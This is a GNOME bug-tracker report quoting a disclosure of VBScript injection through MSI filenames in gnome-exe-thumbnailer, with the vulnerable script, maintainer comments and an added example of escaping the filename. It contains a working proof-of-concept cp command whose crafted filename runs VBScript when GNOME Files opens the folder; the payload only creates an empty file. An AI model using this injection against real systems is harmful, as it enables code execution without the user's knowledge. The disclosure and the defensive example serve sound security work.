Bug 785049 - VBScript Injection via MSI files via GNOME Thumbnailer
Status: RESOLVED NOTGNOME
Product: gnome-desktop
Classification: Core
Component: Thumbnail
Assigned To: Desktop Maintainers
Reported: 2017-07-18 08:36 UTC by Tobias Mueller
Modified: 2017-07-20 04:45 UTC
Description Tobias Mueller 2017-07-18 08:36:27 UTC
From http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html probably authored by Nils Dagsson Moskopp:



VBScript Injection via GNOME Thumbnailer
Summary
Vulnerability

Thumbnail generation for MSI files in GNOME Files executes arbitrary VBScript.
Remedy (for users)

Delete all files in /usr/share/thumbnailers. Do not use GNOME Files. Uninstall any other software that facilitates automatically executing parts of filenames as code.
Remedy (for developers)

Do not parse files with bug-ridden ad-hoc parsers. Fully recognize inputs before processing them. Do not use templates, use unparsers instead. Read about LANGSEC.
Marketing Materials

I name this vulnerability Bad Taste. Its logo is a color-shifted logo of Wine:
Proof of Concept
Install Dependencies

On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.

If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.
Create MSI Files

Create a file named poc.xml with the following content:

<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Version="1.0"/>
</Wix>

Execute the following Bourne Shell code:

wixl -o poc.msi poc.xml
cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"

Trigger Execution

Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
Details

Many file managers generate thumbnails depending on file formats. On GNU/Linux, to find a program that can generate a thumbnail for a particular file format, the file manager GNOME Files uses thumbnailer configuration files in /usr/share/thumbnailers. With the Debian package gnome-exe-thumbnailer installed, the file /usr/share/thumbnailers/exe-dll-msi.thumbnailer contains the following text:

[Thumbnailer Entry]
TryExec=/usr/bin/gnome-exe-thumbnailer
Exec=/usr/bin/gnome-exe-thumbnailer %i %o %u
MimeType=application/x-ms-dos-executable;application/x-msdownload;application/x-msi;application/x-ms-shortcut

This means that whenever an icon for a Microsoft Windows executable (EXE), installer (MSI), library (DLL), or shortcut (LNK) should be shown, GNOME Files calls /usr/bin/gnome-exe-thumbnailer to either extract an embedded icon from the file in question or deliver a fallback image for the appropriate filetype.

The shell script /usr/bin/gnome-exe-thumbnailer contains this code:

# Get the version number:
if [[ ${INPUTFILE##*.} = 'msi' ]]
then
	# Look for the ProductVersion property if user has the Microsoft (R) Windows Script Host installed:
	if which wine && grep -v 'Wine placeholder DLL' $HOME/.wine/drive_c/windows/system32/cscript.exe
	then
		# Workaround wine bug #19799: cscript crashes if you call WScript.Arguments(0)
		# http://bugs.winehq.org/show_bug.cgi?id=19799
		<<< "
			Dim WI, DB, View, Record
			Set WI = CreateObject(\"WindowsInstaller.Installer\")
			Set DB = WI.OpenDatabase(\"$INPUTFILE\",0)
			Set View = DB.OpenView(\"SELECT Value FROM Property WHERE Property = 'ProductVersion'\")
			View.Execute
			Wscript.Echo View.Fetch.StringData(1)
		" iconv -f utf8 -t unicode > $TEMPFILE1.vbs

		VERSION=$(
			DISPLAY=NONE wine cscript.exe //E:vbs //NoLogo Z:\\tmp\\${TEMPFILE1##*/}.vbs 2>/dev/null \
			| egrep -o '^[0-9]+\.[0-9]+(\.[0-9][0-9]?)?(beta)?'
		)

	else
		# Try to get the version number from extended file properties at least:
		VERSION=$(
			file "$INPUTFILE" \
			| grep -o ', Subject: .*, Author: ' \
			| egrep -o '[0-9]+\.[0-9]+(\.[0-9][0-9]?)?(beta)?' \
			| head -1
		)
	fi

To summarize: Instead of parsing an MSI file to get its version number, this code creates a script containing the filename for which a thumbnail should be shown and executes that using Wine. The script is constructed using a template, which makes it possible to embed VBScript in a filename and trigger its execution.

Since only one line of VBScript is available, statements injected via the filename must be separated by colons. A single apostrophe character (') can be used to start a comment that goes until the end of the line.
2017-07-17 14:47 – 2017-07-17 16:40
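
The templating flaw described in the report above, shown as an added example that is not part of the original report and is not code from gnome-exe-thumbnailer: the same OpenDatabase line is rendered once by plain interpolation and once with the filename escaped as a VBScript string literal, and a structural check confirms whether the result is still a single call with a single string argument. The function names and the sample filename are constructed for illustration; escaping is the narrowest repair for this one template, whereas the report's own remedy is to stop generating script text from untrusted names.

```shell
#!/bin/sh
# Added example (not code from gnome-exe-thumbnailer). Function names and the
# sample filename are constructed for illustration.

NL='
'
CR=$(printf '\r')

# Pattern from the excerpt: the filename is pasted into the VBScript line as-is.
render_unsafe() {
	printf 'Set DB = WI.OpenDatabase("%s",0)\n' "$1"
}

# Hardened: refuse names that cannot live in a one-line VBScript string literal,
# then write every double quote as two, which is how VBScript escapes it.
render_escaped() {
	case $1 in
		*"$NL"* | *"$CR"*) return 1 ;;
	esac
	escaped=$(printf '%s' "$1" | sed 's/"/""/g')
	printf 'Set DB = WI.OpenDatabase("%s",0)\n' "$escaped"
}

# Structural check: the line must be exactly the template with one string
# literal as the first argument and nothing after the closing parenthesis.
is_single_literal() {
	case $1 in
		*"$NL"*) return 1 ;;
	esac
	printf '%s\n' "$1" |
		grep -Eq '^Set DB = WI\.OpenDatabase\("([^"]|"")*",0\)$'
}

# Constructed, harmless filename that still contains the delimiter character.
sample='my "quoted" file.msi'

report() {
	if is_single_literal "$1"; then echo "intact:  $1"; else echo "altered: $1"; fi
}

report "$(render_unsafe "$sample")"
report "$(render_escaped "$sample")"
```

The structural check is also usable as a regression test for any script that still builds the line from a template: feed it a corpus of awkward filenames and fail the build on any "altered" result.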
Comment 1 Tobias Mueller 2017-07-18 08:55:37 UTC
FTR: This is caused by downstream code which has already been fixed: https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5

The report may sound a bit as if GNOME code is exploited here, but that's not the case.

However, it makes sense to separate privileges for parsing (untrusted) data.
Comment 2 Carlos Soriano 2017-07-18 08:58:40 UTC
This is obviously not Nautilus, moving to gnome-desktop to implement proper privilege separation.
Comment 3 Bastien Nocera 2017-07-20 01:44:01 UTC
Thanks for taking the time to report this.
This particular bug has already been reported into our bug tracking system, but please feel free to report any further bugs you find.

*** This bug has been marked as a duplicate of bug 774497 ***